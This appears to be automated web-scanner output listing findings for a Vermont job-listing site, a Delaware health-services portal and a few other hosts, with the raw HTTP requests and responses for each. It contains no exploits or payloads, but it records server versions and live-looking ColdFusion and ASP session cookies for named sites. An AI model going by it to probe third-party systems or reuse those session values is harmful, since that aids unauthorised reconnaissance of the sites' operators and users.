| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.vermontj |
| Path: | /ada/mn_warn_dsp.cfm |
| GET /ada/mn_warn_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 29 Apr 2011 21:11:49 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf location: /ada/mn_warninfo_dsp.cfm Content-Type: text/html; charset=UTF-8 <!-- vermontjoblink --><!-- vjlpub --><!-- URL validated --><!-- App list: (vjlpub) --><!-- Load Balancing is Off --> |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.vermontj |
| Path: | /ada/services/schools |
| GET /ada/services/schools Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:59 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.vermontj |
| Path: | /ada/works/FAQ.cfm |
| GET /ada/works/FAQ.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:55 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.vermontj |
| Path: | /ada/works/Login.cfm |
| GET /ada/works/Login.cfm HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontj User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:04 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.vermontj |
| Path: | /ada/works/contactus.cfm |
| GET /ada/works/contactus.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:53 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.vermontj |
| Path: | /ada/works/employero |
| GET /ada/works/employero Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:50 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.vermontj |
| Path: | /ada/works/joboverview |
| GET /ada/works/joboverview Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:50 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.vermontj |
| Path: | /ada/works/jobsearch.cfm |
| GET /ada/works/jobsearch.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:49 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.vermontj |
| Path: | /ada/works/linkview.cfm |
| GET /ada/works/linkview.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:51 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org server-error: true Content-Type: text/html; charset=UTF-8 Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Bookmark Error <b>You may be seeing this error as a result of bookmarking this page. Unfortunately, our site design will not allow the bookmarking of most internal pages.</b> If you wish to contact th ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.vermontj |
| Path: | /ada/works/resources |
| GET /ada/works/resources Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:50 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.vermontj |
| Path: | /favicon.ico |
| GET /favicon.ico HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 29 Apr 2011 21:07:34 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf location: /ada/404/404_qry.cfm Content-Type: text/html; charset=UTF-8 <!-- vermontjoblink --><!-- vjlpub --><!-- App list: (vjlpub) --><!-- Load Balancing is Off --> |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://adwords.google |
| Path: | /um/StartNewLogin |
| GET /um/StartNewLogin HTTP/1.1 Host: adwords.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 302 Moved Temporarily Set-Cookie: AdsUserLocale=en; Path=/; Secure Set-Cookie: SAG=EXPIRED;Path=/ Set-Cookie: S=adwords-usermgmt Location: https://www.google.com X-Invoke-Duration: 15 Content-Type: text/html; charset=UTF-8 Date: Sat, 30 Apr 2011 12:18:53 GMT Expires: Sat, 30 Apr 2011 12:18:53 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Connection: close <HTML> <HEAD> <TITLE>Moved Temporarily</TITLE> </HEAD> <BODY BGCOLOR="#FFFFFF" TEXT="#000000"> <H1>Moved Temporarily</H1> The document has moved <A HREF="https://www.google ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://ask.census.gov |
| Path: | /cgi-bin/askcensus.cfg |
| GET /cgi-bin/askcensus.cfg Host: ask.census.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 301 Moved Permanently Date: Sat, 30 Apr 2011 12:19:03 GMT Location: /ci/redirect/enduser RNT-Time: D=14955 t=1304165943571922 RNT-Machine: 04 Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: TS8118ae=95ba3721f71 Content-Length: 1 |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://assist.dhss |
| Path: | /INCLUDES/INJSC.JS |
| GET /INCLUDES/INJSC.JS HTTP/1.1 Host: assist.dhss.delaware.gov Connection: keep-alive Referer: https://assist.dhss User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: assist-persist=170663852 |
| HTTP/1.1 200 OK Set-Cookie: assist-persist=170663852 Content-Length: 39514 Content-Type: application/x-javascript Last-Modified: Wed, 31 Aug 2005 20:05:30 GMT Accept-Ranges: bytes ETag: "021245667aec51:71c5" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sat, 30 Apr 2011 00:36:06 GMT /*'********************** 'Name: INJSC.JS Date Created: 8/28/2002 Created By:Vinod Kesavan 'Purpose: page to store javascript functions ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://assist.dhss |
| Path: | /PGM/asp/pdf/form204 |
| GET /PGM/asp/pdf/form204 Host: assist.dhss.delaware.gov Connection: keep-alive Referer: https://assist.dhss User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDACRDBQAB |
| HTTP/1.1 200 OK Set-Cookie: assist-persist=170663852 Content-Length: 192807 Content-Type: application/pdf Last-Modified: Wed, 19 May 2010 20:32:37 GMT Accept-Ranges: bytes ETag: "96f09f6b92f7ca1:71c5" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sat, 30 Apr 2011 00:42:44 GMT %PDF-1.5%.... 7 0 obj <</Linearized 1/L 192807/O 12/E 187432/N 1/T 192607/H [ 1176 235]>>endobj xref 7 44 0000000016 00000 n 0000001411 00000 n 0000001546 00000 n 0000001176 0 ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://assist.dhss |
| Path: | /Style/ASSIST_SC_StyleNET |
| GET /Style/ASSIST_SC_StyleNET Host: assist.dhss.delaware.gov Connection: keep-alive Referer: https://assist.dhss User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: assist-persist=170663852 |
| HTTP/1.1 200 OK Set-Cookie: assist-persist=170663852 Content-Length: 5482 Content-Type: text/css Last-Modified: Mon, 07 Mar 2005 22:01:40 GMT Accept-Ranges: bytes ETag: "0fa773d6123c51:71c5" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sat, 30 Apr 2011 00:36:06 GMT BODY { BACKGROUND-POSITION: left top; MARGIN-TOP: 0px; PADDING-LEFT: 0px; FONT-SIZE: 0pt; MARGIN-LEFT: 0px; PADDING-TOP: 0px; FONT-FAMILY: Arial } .PageTableClass ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://assist.dhss |
| Path: | /Style/Assist_Style_NET |
| GET /Style/Assist_Style_NET Host: assist.dhss.delaware.gov Connection: keep-alive Referer: https://assist.dhss User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDACRDBQAB |
| HTTP/1.1 200 OK Set-Cookie: assist-persist=170663852 Content-Length: 5357 Content-Type: text/css Last-Modified: Mon, 07 Mar 2005 22:01:40 GMT Accept-Ranges: bytes ETag: "0fa773d6123c51:71c5" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sat, 30 Apr 2011 01:15:44 GMT BODY { BACKGROUND-POSITION: left top; MARGIN-TOP: 0px; PADDING-LEFT: 0px; FONT-SIZE: 0pt; MARGIN-LEFT: 0px; PADDING-TOP: 0px; FONT-FAMILY: Arial } .PageTableClass ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://assist.dhss |
| Path: | /favicon.ico |
| GET /favicon.ico HTTP/1.1 Host: assist.dhss.delaware.gov Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDACRDBQAB |
| HTTP/1.1 404 Not Found Set-Cookie: assist-persist=170663852 Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sat, 30 Apr 2011 00:36:14 GMT <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; cha ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://assist.dhss |
| Path: | /images/Assist_header |
| GET /images/Assist_header Host: assist.dhss.delaware.gov Connection: keep-alive Referer: https://assist.dhss User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDACRDBQAB |
| HTTP/1.1 200 OK Set-Cookie: assist-persist=170663852 Content-Length: 3360 Content-Type: image/jpeg Last-Modified: Wed, 20 Apr 2005 20:31:34 GMT Accept-Ranges: bytes ETag: "0d76af1e745c51:71c5" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sat, 30 Apr 2011 00:36:10 GMT ......JFIF.....`.`.....C. ................... $.' ",#..(7),01444.'9=82<.342 ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://assist.dhss |
| Path: | /images/Assist_header |
| GET /images/Assist_header Host: assist.dhss.delaware.gov Connection: keep-alive Referer: https://assist.dhss User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDACRDBQAB |
| HTTP/1.1 200 OK Set-Cookie: assist-persist=170663852 Content-Length: 11588 Content-Type: image/gif Last-Modified: Tue, 15 Mar 2005 21:38:48 GMT Accept-Ranges: bytes ETag: "064ff5ea729c51:71c5" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sat, 30 Apr 2011 00:36:10 GMT GIF89aX..........@@...... ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://assist.dhss |
| Path: | /images/Assist_logo.gif |
| GET /images/Assist_logo.gif HTTP/1.1 Host: assist.dhss.delaware.gov Connection: keep-alive Referer: https://assist.dhss User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDACRDBQAB |
| HTTP/1.1 200 OK Set-Cookie: assist-persist=170663852 Content-Length: 795 Content-Type: image/gif Last-Modified: Thu, 24 Feb 2005 19:46:10 GMT Accept-Ranges: bytes ETag: "02d117da91ac51:71c5" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sat, 30 Apr 2011 00:36:10 GMT GIF89a".!.......{...ss... ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://assist.dhss |
| Path: | /images/arrow_center.gif |
| GET /images/arrow_center.gif HTTP/1.1 Host: assist.dhss.delaware.gov Connection: keep-alive Referer: https://assist.dhss User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDACRDBQAB |
| HTTP/1.1 200 OK Set-Cookie: assist-persist=170663852 Content-Length: 214 Content-Type: image/gif Last-Modified: Tue, 25 Jan 2005 16:29:15 GMT Accept-Ranges: bytes ETag: "80bf622fb2c51:71c5" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sat, 30 Apr 2011 00:37:48 GMT GIF89a.. ......................... .Z...v..z.....\..E...h.. ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://assist.dhss |
| Path: | /images/arrow_left.gif |
| GET /images/arrow_left.gif HTTP/1.1 Host: assist.dhss.delaware.gov Connection: keep-alive Referer: https://assist.dhss User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDACRDBQAB |
| HTTP/1.1 200 OK Set-Cookie: assist-persist=170663852 Content-Length: 368 Content-Type: image/gif Last-Modified: Tue, 25 Jan 2005 16:29:15 GMT Accept-Ranges: bytes ETag: "80bf622fb2c51:71c5" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sat, 30 Apr 2011 00:37:48 GMT GIF89a.. ..........4fg............ ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://assist.dhss |
| Path: | /images/arrow_right.gif |
| GET /images/arrow_right.gif HTTP/1.1 Host: assist.dhss.delaware.gov Connection: keep-alive Referer: https://assist.dhss User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDACRDBQAB |
| HTTP/1.1 200 OK Set-Cookie: assist-persist=170663852 Content-Length: 370 Content-Type: image/gif Last-Modified: Tue, 25 Jan 2005 16:29:15 GMT Accept-Ranges: bytes ETag: "80bf622fb2c51:71c5" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sat, 30 Apr 2011 00:37:48 GMT GIF89a.. ..........4fg............ .....\c{..5.X.K.......*.* ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://assist.dhss |
| Path: | /images/corner_brown |
| GET /images/corner_brown Host: assist.dhss.delaware.gov Connection: keep-alive Referer: https://assist.dhss User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDACRDBQAB |
| HTTP/1.1 200 OK Set-Cookie: assist-persist=170663852 Content-Length: 72 Content-Type: image/gif Last-Modified: Tue, 25 Jan 2005 16:29:16 GMT Accept-Ranges: bytes ETag: "056fb2fb2c51:71c5" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sat, 30 Apr 2011 00:36:10 GMT GIF89a.. ........uu.......aa....** ...h....,...E.R..; |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://assist.dhss |
| Path: | /images/corner_teal_color |
| GET /images/corner_teal_color Host: assist.dhss.delaware.gov Connection: keep-alive Referer: https://assist.dhss User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDACRDBQAB |
| HTTP/1.1 200 OK Set-Cookie: assist-persist=170663852 Content-Length: 76 Content-Type: image/gif Last-Modified: Tue, 25 Jan 2005 16:29:16 GMT Accept-Ranges: bytes ETag: "056fb2fb2c51:71c5" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sat, 30 Apr 2011 00:36:10 GMT GIF89a . ......................... . ....H...0J....<!F..0$.; |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://assist.dhss |
| Path: | /images/gold_rule_shim |
| GET /images/gold_rule_shim Host: assist.dhss.delaware.gov Connection: keep-alive Referer: https://assist.dhss User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDACRDBQAB |
| HTTP/1.1 200 OK Set-Cookie: assist-persist=170663852 Content-Length: 43 Content-Type: image/gif Last-Modified: Tue, 25 Jan 2005 16:29:17 GMT Accept-Ranges: bytes ETag: "80ec933fb2c51:71c5" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sat, 30 Apr 2011 00:36:11 GMT GIF89a........**...!..... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://assist.dhss |
| Path: | /images/shim.gif |
| GET /images/shim.gif HTTP/1.1 Host: assist.dhss.delaware.gov Connection: keep-alive Referer: https://assist.dhss User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDACRDBQAB |
| HTTP/1.1 200 OK Set-Cookie: assist-persist=170663852 Content-Length: 43 Content-Type: image/gif Last-Modified: Tue, 25 Jan 2005 16:29:17 GMT Accept-Ranges: bytes ETag: "80ec933fb2c51:71c5" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sat, 30 Apr 2011 00:36:10 GMT GIF89a.............!..... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://favorites.live |
| Path: | /quickadd.aspx |
| GET /quickadd.aspx HTTP/1.1 Host: favorites.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
